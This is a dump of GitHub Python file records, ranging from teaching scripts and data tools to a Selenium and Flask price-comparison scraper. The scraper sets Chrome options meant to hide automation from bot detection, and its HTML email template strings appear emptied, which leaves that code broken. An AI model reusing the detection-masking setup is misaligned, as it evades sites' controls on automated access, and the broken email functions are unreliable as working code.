B[int(length/2)]=1\r\n#\r\n tom=turtle.Pen() \r\n tom.speed(0)\r\n turtle.bgcolor(\"white\") # Background color\r\n tom.pencolor(\"black\") # Line color\r\n tom.pensize(1) # Line width\r\n#\r\n for i in range(generations):\r\n tom.hideturtle() \r\n xshapes(tom,B,size,symmetry)\r\n tom.up()\r\n tom.goto(-300,-300)\r\n tom.down()\r\n ID=str(symmetry)+' '+str(int(R))+' '+str(i)+' '+str(length)+' '+str(size)\r\n tom.write(ID,align=\"left\",font=(\"Arial\",16,\"normal\")) \r\n filename='xfamily'+str(i)+'.ps'\r\n turtle.getscreen().getcanvas().postscript(file=filename)\r\n time.sleep(2)\r\n tom.reset()\r\n B=CAstep(B,rule) \r\nmain()\r\n","repo_name":"mohmaj/ArtOfCoding","sub_path":"Chapter 3 Coding for Art/3.3 Abstract Art/3.3.3 Geometric art with Python: adult colouring book 
series/xfamily.py","file_name":"xfamily.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"40738350911","text":"import streamlit as st\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# Load the iris dataset\r\niris = load_iris()\r\nX = iris.data\r\ny = iris.target\r\n\r\n# Split the data into training and test sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train a decision tree classifier\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n# Create a Streamlit app\r\nst.title('Iris Species Prediction App')\r\n\r\n# Create sliders for input features\r\nsepal_length = st.slider('Sepal Length', min_value=4.0, max_value=8.0, value=5.0)\r\nsepal_width = st.slider('Sepal Width', min_value=2.0, max_value=5.0, value=3.0)\r\npetal_length = st.slider('Petal Length', min_value=1.0, max_value=7.0, value=4.0)\r\npetal_width = st.slider('Petal Width', min_value=0.1, max_value=3.0, value=1.0)\r\n\r\n# Predict the species of the iris\r\nfeatures = [[sepal_length, sepal_width, petal_length, petal_width]]\r\nprediction = clf.predict(features)\r\nst.subheader(f'The species of the iris is predicted to be: {iris.target_names[prediction][0]}')\r\n","repo_name":"gitlearner246/streamlit_test","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"6370399722","text":"import re\nfrom operator import itemgetter\n\nimport jieba\nimport zhon.hanzi as chinese\nimport weibo_reader.weiboReader_LineByLine as wr\n\nre_chinese = re.compile('[%s]' % chinese.characters)\n\n\ndef jieba_tokenizer(doc):\n tokens = jieba.cut(doc)\n return [word for word in tokens\n if len(word) > 1\n and re_chinese.match(word)]\n\n\nweiboes = wr.Weibo_Reader_Line_by_Line(r\"../data/weibo.csv\")\ntexts = (item.content for item in weiboes.weibo_items())\njieba_results = (jieba_tokenizer(text) for text in texts)\ndic = dict()\nfor words in jieba_results:\n for word in words:\n dic[word] = dic.get(word, 0) + 1\nsorted_dic = sorted(dic.items(), key=itemgetter(1), reverse=True)\nwith open(r\"..\\data\\word_frequency.txt\", \"w\", encoding=\"utf-8\") as out_f:\n for k, v in sorted_dic:\n out_f.write(\"%s:%d\\n\" % (k, v))\n","repo_name":"KindRoach/SocialOnInternet","sub_path":"weibo_reader/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"4695788738","text":"#encoding:UTF-8\nimport os\nimport re\nimport sys\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\ndef getHtml(url):\n\thtmlDoc = request.urlopen(url).read()\n\thtmlDoc = htmlDoc.decode('UTF-8')\n\treturn htmlDoc\n\ndef removeScript(soup):\n\tfor script in soup.find_all('script'):\n\t\tscript.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeSegmentFaultTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t\t[\"col-md-4\", \"clearfix mt10\", \"widget-box\", \"recommend-post\", \"text-center mt10\", \"global-navTags\",\n\t\t\t\"post-topheader custom-\", \"global-nav sf-header\", \"app-promotion-bar\", \"widget-comments hidden\", \"modal\",\n\t\t\t\"hidden widget-register widget-welcome-question mt20 hidden-xs widget-welcome widget-register-slideUp\",\n\t\t\t\"modal widget-911\", \"col-xs-12 col-md-3 side\"])\n\tsoup = removeTag(soup, \"img\", \"id\", ['icon4weChat', 'icon4weChat'])\n\tsoup = removeTag(soup, \"div\", \"id\", [\"fixedTools\"])\n\tsoup = removeTag(soup, \"footer\", \"id\", [\"footer\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", ['h4 post-comment-title'])\n\treturn soup\n\ndef removeJobboleTag(soup):\n\tnav_classes = [\"menu-nav\", \"grid-12 menu-nav\"]\n\tfor navclass in nav_classes:\n\t\tnav = soup.find(\"nav\", {\"class\": navclass})\n\t\tif nav is not None:\n\t\t\tnav.decompose()\n\tdiv_classes = [\"header-wrapper\", \"grid-4\", \"wp_rp_wrap wp_rp_plain\",\n\t\"dot-box center-align\", \"author-bio-info\", \"navigation margin-20\",\n\t\"post-adds\", \"comments\", \"entry-meta\", \"copyright-area\", \"crayon-toolbar\", \"crayon-main\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-btm\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-top\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"author-bio\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"rewardbox\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"breadcrumb\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"style\": \"text-align: left;\"})\n\tdiv.decompose()\n\tblockquote = soup.find(\"blockquote\", {\"class\": \"rewards\"})\n\tif blockquote is not None:\n\t\tblockquote.decompose()\n\tfooter = soup.find(\"footer\")\n\tfooter.decompose()\n\tstyle = soup.find(\"style\")\n\tstyle.decompose()\n\tfor textwidget in soup.findAll(\"div\", {\"class\": \"textwidget\"}):\n\t\ttextwidget.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeInfoQCN(soup):\n\tdiv_ides = [\"topInfo\", \"header\", \"contentRatingWidget\", \"comment_here\", \"footer\",\n\t\"forceUpdate_inline\", \"replyPopup\", \"id_geo_banner\", \"forceProfileUpdateArea\", \"overlay_comments\",\n\t\"editCommentPopup\", \"messagePopup\", \"responseContent\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tdiv_classes = [\"related_sponsors visible stacked\", \"random_links\", \"clear\", \"comments\",\n\t\"all_comments\", \"newsletter \", \"bottomContent\", \"login_overlay\", \"article_page_right\",\n\t\"related_sponsors relEdRelRes\", \"intbt\", 
\"related_sponsors wholething\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tspan = soup.find(\"span\", {\"class\": \"author_general\"})\n\tif span is not None:\n\t\tspan.decompose()\n\ta = soup.find(\"a\", {\"class\": \"comments_like\"})\n\tif a is not None:\n\t\ta.decompose()\n\tul = soup.find(\"ul\", {\"class\": \"sh_t\"})\n\tif ul is not None:\n\t\tul.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeITEBlog(soup):\n\tdiv_classes = [\"navbar\", \"banner banner-site\", \"speedbar\", \"tongji\", \"QRcode\", \"comt-title\", \"relates\",\n\t\"widget widget_text\", \"no_webshot\", \"article-social\", \"related_top\", \"banner banner-related\", \"banner banner-comment\",\n\t\"announcement\", \"meta\", \"no_bullets\"\n\t]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv_ides = [\"postcomments\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tfor header in soup.findAll(\"header\", {\"class\": \"header\"}):\n\t\theader.decompose()\n\taside = soup.find(\"aside\")\n\tif aside is not None:\n\t\taside.decompose()\n\tnav = soup.find(\"nav\")\n\tif nav is not None:\n\t\tnav.decompose()\n\tspan = soup.find(\"span\", {\"style\": \"margin-top: 15px; color:red; display:block;text-align:center;\"})\n\tif span is not None:\n\t\tspan.decompose()\n\tfor footer in soup.findAll(\"footer\"):\n\t\tfooter.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeIBMTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\", \n\t\t[\"dw-home-band\", \"ibm-access\", \"ibm-col-6-2 dw-toc-margin\", \"dw-footer-columns\", \"ibm-col-6-2\",\n\t \"ibm-container ibm-alternate ibm-buttons-last\", \"ibm-common-overlay\", \"ibm-no-print\", \"metavalue\"])\n\tsoup = removeTag(soup, \"div\", \"id\", \n\t\t[\"dw-masthead-top-row\", \"ibm-masthead\", \"ibm-footer-module-dwwrapper\", \"ibm-footer\", \"ibm-metrics\"])\n\tsoup = removeTag(soup, \"ul\", \"class\", [\"ibm-portrait-module-list\"])\n\tsoup = removeTag(soup, \"ul\", \"id\", [\"ibm-navigation-trail\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", [\"ibm-alternate-rule ibm-no-print\"])\n\tsoup = removeTag(soup, \"p\", \"class\", [\"ibm-ind-link ibm-back-to-top\"])\n\treturn soup\n\ndef removeFreeBufTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t[\"panel panel-default\", \"commentshow\", \"comment-list\", \"panel panel-default rec-spe\"])\n\treturn soup\n\nif len(sys.argv) < 2:\n sys.stderr.write('Usage: clean [url] ')\n sys.exit(1)\n\nurl = sys.argv[1]\nhtmlDoc = getHtml(url)\nsoup = BeautifulSoup(htmlDoc, \"lxml\")\nsoup = removeScript(soup)\nif \"segmentfault.com\" in url:\n\tsoup = removeSegmentFaultTag(soup)\nelif \"jobbole.com\" in url:\n\tsoup = removeJobboleTag(soup)\nelif \"www.infoq.com/cn\" in url:\n\tsoup = removeInfoQCN(soup)\nelif \"iteblog\" in url:\n\tsoup = removeITEBlog(soup)\nelif \"www.ibm.com/developerworks\" in url:\n\tsoup = removeIBMTag(soup)\nelif \"www.freebuf.com\" in url:\n\tsoup = removeFreeBufTag(soup)\n\nhtml = soup.prettify(\"utf-8\")\n\nwith open(\"output.html\", \"wb\") as file:\n 
file.write(html)\n","repo_name":"HungMingWu/CleanerWebsite","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12016187860","text":"import os\nimport glob\nimport json\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import List\nfrom training.utils.reader import DataReader, ModelTrainingData\n\n\ndef get_run_number(run_dir_path: str) -> int:\n return int(run_dir_path.split(\"_\")[-1])\n\n\ndef get_episode_reward(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.reward for step in episode_data])\n\n\ndef get_episode_passes(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.n_balls_passed for step in episode_data])\n\n\ndef get_action_distribution(run_data_list: List[List[ModelTrainingData]]):\n total_samples = 0\n dist = np.zeros(run_data_list[0][0].model_output.action_space_size)\n for d in run_data_list:\n total_samples += len(d)\n for t_step in d:\n dist[t_step.model_output.role] += 1\n dist = dist/total_samples\n return dist\n\n\ndef total_times_over_runs(times: pd.DataFrame, key: str) -> pd.DataFrame:\n totals = pd.DataFrame()\n times = times.reset_index(drop=True)\n for i, pd_index in enumerate(times.index):\n totals = totals.append([times[key][:i].sum() + times[key][pd_index]], ignore_index=True)\n times[key + \" over runs\"] = totals\n return times\n\n\ndef get_time_spent_simulating_training_per_run(exp_data: pd.DataFrame):\n return total_times_over_runs(exp_data[\"simulated training data time per epoch\"])\n\n\ndef get_total_time_over_runs(exp_data: pd.DataFrame, key: str) -> pd.DataFrame:\n new_data = pd.DataFrame()\n for t_id in exp_data[\"turtle\"].unique():\n for name in exp_data[\"name\"].unique():\n set_with_comp_data = exp_data[(exp_data['name'] == name) & (exp_data['turtle'] == t_id)]\n set_with_comp_data = total_times_over_runs(set_with_comp_data, key)\n new_data = new_data.append(set_with_comp_data, ignore_index=True)\n return new_data\n\n\ndef get_run_turtle_data(data_dir_path: str, turtle_id: int) -> dict:\n run_data = []\n reader = DataReader()\n search_string = data_dir_path + \"/model_data*t\" + str(turtle_id) + \"*.mb\"\n files = glob.glob(search_string)\n if len(files) > 0:\n for index, file in enumerate(files):\n run_data.append(reader.read_data(file))\n action_distribution = get_action_distribution(run_data)\n\n return {\"mean epoch reward\": np.mean([get_episode_reward(episode) for episode in run_data]),\n \"quantile 1st epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.75),\n \"mean epoch passes\": np.mean([get_episode_passes(episode) for episode in run_data]),\n \"quantile 1st epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.75),\n \"action pass\": action_distribution[0],\n \"action receive\": action_distribution[1],\n \"action move\": action_distribution[2],\n \"action intercept\": action_distribution[3]}\n\n\ndef get_computation_time(run_dir_path: str) -> dict:\n file_path = os.path.join(run_dir_path,\n \"models/training/time_per_training_epoch.timepickle\")\n if os.path.exists(file_path):\n with open(file_path, \"rb\") as file:\n epoch_training_times = pickle.load(file)\n return {\"computation time\": np.sum([np.round(time.microseconds)/1e6 for time in epoch_training_times])}\n return {\"computation time\": 0}\n\n\ndef get_run_meta_data(run_dir_path: str) -> dict:\n with open(os.path.join(run_dir_path, 
\"config/config.json\"), 'r') as file:\n meta_data_file: dict = json.load(file)\n simulated_epoch_time_for_training = meta_data_file[\"inference\"][\"episodes\"] * meta_data_file[\"inference\"][\"episode_time\"]\n meta_data = {\"name\": meta_data_file[\"name\"],\n \"algorithm\": meta_data_file[\"algorithm\"],\n \"evaluation episodes per epoch\": meta_data_file[\"evaluation\"][\"episodes\"],\n \"evaluation time per episode\": meta_data_file[\"evaluation\"][\"episode_time\"],\n \"training data episodes per epoch\": meta_data_file[\"inference\"][\"episodes\"],\n \"training data time per episode\": meta_data_file[\"inference\"][\"episode_time\"],\n \"simulated training time\": simulated_epoch_time_for_training,\n \"simulated training frames\": round(simulated_epoch_time_for_training*100)}\n\n if meta_data_file[\"algorithm\"] == \"simple_pg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"vpg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"policy_learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"rule_based\" or meta_data_file[\"algorithm\"] == \"uniform_sampling\":\n meta_data[\"learning rate\"] = None\n meta_data[\"network sizes\"] = None\n meta_data[\"training data time per episode\"] = 0\n meta_data[\"simulated training time\"] = 0\n return meta_data\n\n\ndef get_run_data(run_dir_path: str, turtle_id: int) -> dict:\n run_data_dict = {\"run\": get_run_number(run_dir_path),\n \"turtle\": turtle_id,\n \"training time\": None}\n run_data_dict.update(get_run_meta_data(run_dir_path))\n run_data_dict.update(get_run_turtle_data(os.path.join(run_dir_path, \"evaluation\"), turtle_id))\n run_data_dict.update(get_computation_time(run_dir_path))\n return run_data_dict\n\n\ndef get_experiment_data(experiment_dir_path: str) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for t_id in [2, 3]:\n dirs = [d for d in os.listdir(experiment_dir_path)\n if os.path.isdir(os.path.join(experiment_dir_path, d))]\n for run_dir in dirs:\n if not run_dir == \"figures\":\n run_data = get_run_data(\n os.path.join(experiment_dir_path, run_dir), t_id)\n experiment_data = experiment_data.append(run_data, ignore_index=True)\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'computation time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training frames')\n experiment_data[\"training time\"] = experiment_data[\"computation time\"] \\\n + experiment_data[\"simulated training time\"]\n experiment_data[\"training time over runs\"] = experiment_data[\"computation time over runs\"] \\\n + experiment_data[\"simulated training time over runs\"]\n return experiment_data\n\n\ndef get_experiments_data(experiment_dir_paths: List[str]) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for dir_path in experiment_dir_paths:\n experiment_data = experiment_data.append(get_experiment_data(dir_path))\n return experiment_data\n\n\nif __name__ == \"__main__\":\n test = 
get_experiment_data(\"/home/robocup/svn/trunk/src/Turtle2/Strategy/src/STP/strategy_learner/experiments/results/11-nov-spg-1\")\n print(test)\n","repo_name":"mickeybeurskens/strategy-learner","sub_path":"evaluation/load_experiments.py","file_name":"load_experiments.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9939402889","text":"######################################################\n# Imports\n######################################################\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport jellyfish\n\nfrom flask import Flask, render_template, request\nimport time\n\nimport yagmail\nimport os\n\n\nservice = Service('path') # path to chromedriver for local machine\n\n######################################################\n# web scraping functions\n######################################################\n\ndef clean_price_rtv(text):\n return float(text.split(\" zł\")[0].replace(' ', ''))\n\ndef clean_price_media(text):\n return float(text.replace('\\u202f', ''))\n\n# function below extracts the minimum price from prices lower than maximum price stated in the GUI\n# the similarity ratio of offers and searched product has to be bigger than minimum ratio\n# we are taking into account two highest ratios to avoid rejecting similar item (e.g. just different color) with lower price\n\ndef get_min_price(ratio_list, price_list, threshold, ratio_min):\n if len(ratio_list) > 0 and len(price_list) > 0:\n help_index = [index for index, item in enumerate(price_list) if item <= threshold]\n if help_index != []:\n index = [index for index, item in enumerate(ratio_list) if item >= sorted(ratio_list)[-2] and item > ratio_min and index in help_index]\n min_price = min([price_list[i] for i in index])\n return min_price\n\ndef get_driver(url):\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-dev-shm-usage\")\n options.add_argument(\"no-sandbox\")\n options.add_argument(\"--headless=new\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"disable-blink-features=AutomationControlled\")\n\n driver = webdriver.Chrome(service=service, options=options)\n driver.get(url)\n return driver\n\n\ndef rtv_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/ems-root/eui-root/eui-dropdown-host/div[2]/ems-euro-mobile/ems-euro-mobile-shared-feature-header-wrapper/ems-euro-mobile-shared-feature-header/div/ems-header/div[2]/div/div/div[2]/ems-euro-mobile-shared-feature-search-container/div/div/ems-search-input/ems-text-input/label/div/div/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box-medium__link')\n WebDriverWait(driver, 10).until(EC.presence_of_element_located(expected))\n offers = driver.find_elements(By.CLASS_NAME, \"box-medium__link\")\n prices = driver.find_elements(By.CLASS_NAME, \"price__value\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n link_list.append(offer.get_attribute('href'))\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_rtv(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 
0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n\ndef media_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/div[1]/div[2]/header[2]/div[2]/div/div/div[2]/div/form/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box')\n WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(expected))\n time.sleep(2)\n\n offers = driver.find_elements(By.CLASS_NAME, \"box\")\n links = driver.find_elements(By.CSS_SELECTOR, \"h2.name.is-section>a\")\n prices = driver.find_elements(By.CLASS_NAME, \"whole\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n for link in links:\n link_list.append(link.get_attribute(\"href\"))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_media(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n######################################################\n# email sending functions\n######################################################\n\n\ndef results_to_html_list(webpage, input):\n if type(input) != str:\n my_string = \"\"\"
\"\"\".format(webpage)\n return my_string\n\n\ndef send_email(sender, receiver, subject, results_list):\n\n email_list = []\n\n for result in results_list:\n email_list.append(results_to_html_list(result[0], result[1]))\n\n contents = \"\"\"\n
Hi! \n Below please find the results of your search:
\n
\n {0}\n
\n
KR, \n Your Python code
\n \"\"\".format(' '.join(email_list))\n\n yag = yagmail.SMTP(user=sender, password=os.getenv('secret_key'))\n yag.send(to=receiver, subject=subject, contents=contents)\n\n\n######################################################\n# Flask app\n######################################################\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('./index.html',\n status=\" hidden\",\n results_rtv=(str(), str(), str()),\n results_media=(str(), str(), str()),)\n\n\n@app.route('/', methods=['POST'])\ndef home_post():\n\n price = float(request.form['price-name'])\n email = str(request.form['email-name'])\n product = str(request.form['product-name'])\n\n results_rtv = rtv_get_results(product, \"https://www.euro.com.pl/\", price)\n results_media = media_get_results(product, \"https://www.mediaexpert.pl/\", price)\n\n if type(results_rtv) == str and type(results_media) == str:\n final_text = \"No results to send via email.\"\n else:\n final_text = \"The results were also sent to the provided email.\"\n results_list = [[\"RTV EURO AGD\", results_rtv], [\"Media Expert\", results_media]]\n send_email('sender email', email, \"RTV product finder results\", results_list)\n\n if type(results_rtv) == str:\n results_rtv = (results_rtv, str(), str())\n\n if type(results_media) == str:\n results_media = (results_media, str(), str())\n\n return render_template('index.html',\n status=\" \",\n price_max=price,\n product=product,\n email=email,\n final_text=final_text,\n results_rtv=results_rtv,\n results_media=results_media)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"kp-muszynski/RTV-web-scraping","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12006893918","text":"# dp[1] = 1\n# dp[2] = 2: 2번 카드 1개, 1번 카드 2개를 쓰는 것 중 큰 수 이다.\n# dp[3] = 3: 3번 카드 1개, 1과 dp[2]를 쓰는 것 중 큰 수이다. 여기서 1,1,1로 3을 만드는 경우, 1,2로 3을 만드는 경우는 dp[2]에서 처리가 끝난 것\n# dp[n] = n: n번 카드 1개 or 1과 dp[n-1] or dp[2]와 dp[n-2], ..dp[i]와 dp[n-i] 중 max\n\nn = int(input())\nprices = list(map(int, input().split()))\nprices.insert(0, 0)\n\ndp = [0] * (n+1)\ndp[0] = 0\ndp[1] = prices[1]\ndp[2] = max(prices[2], dp[1] + prices[1])\n\nfor i in range(3, n+1):\n dp[i] = prices[i]\n for j in range(1, i):\n dp[i] = max(dp[i], dp[j] + dp[i-j])\n\nprint(dp[-1])\n","repo_name":"plibi/codingtest","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7712322366","text":"from mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_model import DeadTimeCorrectionsModel\nfrom mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_view import DeadTimeCorrectionsView\nfrom mantidqtinterfaces.Muon.GUI.Common.utilities.load_utils import get_table_workspace_names_from_ADS, load_dead_time_from_filename\n\n\nclass DeadTimeCorrectionsPresenter:\n \"\"\"\n The DeadTimeCorrectionsPresenter has a DeadTimeCorrectionsView and DeadTimeCorrectionsModel.\n \"\"\"\n\n def __init__(self, view: DeadTimeCorrectionsView, model: DeadTimeCorrectionsModel, corrections_presenter):\n \"\"\"Initialize the DeadTimeCorrectionsPresenter. Sets up the slots and event observers.\"\"\"\n self.view = view\n self.model = model\n self._corrections_presenter = corrections_presenter\n\n self.view.set_slot_for_dead_time_from_selector_changed(self.handle_dead_time_from_selector_changed)\n self.view.set_slot_for_dead_time_workspace_selector_changed(self.handle_dead_time_workspace_selector_changed)\n self.view.set_slot_for_dead_time_file_browse_clicked(self.handle_dead_time_browse_clicked)\n\n def initialize_model_options(self) -> None:\n \"\"\"Initialise the model with the default fitting options.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n\n def handle_ads_clear_or_remove_workspace_event(self, _: str = None) -> None:\n \"\"\"Handle when there is a clear or remove workspace event in the ADS.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.view.set_dead_time_from_data_file_selected()\n elif self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_from_workspace_selected()\n\n def handle_instrument_changed(self) -> None:\n \"\"\"User changes the selected instrument.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_run_selector_changed(self) -> None:\n \"\"\"Handles when the run selector is changed.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.model.set_dead_time_source_to_from_file()\n self.update_dead_time_info_text_in_view()\n\n def handle_dead_time_from_selector_changed(self) -> None:\n \"\"\"Handles when the location where the dead time should be retrieved from changes.\"\"\"\n if self.view.is_dead_time_from_data_file_selected():\n self._handle_dead_time_from_data_file_selected()\n self._set_dead_time_widgets_visible(False, False)\n elif self.view.is_dead_time_from_workspace_selected():\n self._handle_dead_time_from_workspace_selected()\n self._set_dead_time_widgets_visible(True, False)\n elif self.view.is_dead_time_from_other_file_selected():\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, True)\n else:\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, False)\n\n def _handle_dead_time_from_data_file_selected(self) -> None:\n \"\"\"Handles when the dead time from data file is initially selected.\"\"\"\n self.set_dead_time_source_to_from_file()\n\n def _handle_dead_time_from_workspace_selected(self) -> None:\n \"\"\"Handles when the dead time from workspace is initially selected.\"\"\"\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n self.set_dead_time_source_to_from_ads()\n\n def _handle_dead_time_from_none_selected(self) -> None:\n \"\"\"Handles when the dead time is none is initially selected.\"\"\"\n self.set_dead_time_source_to_none()\n\n def 
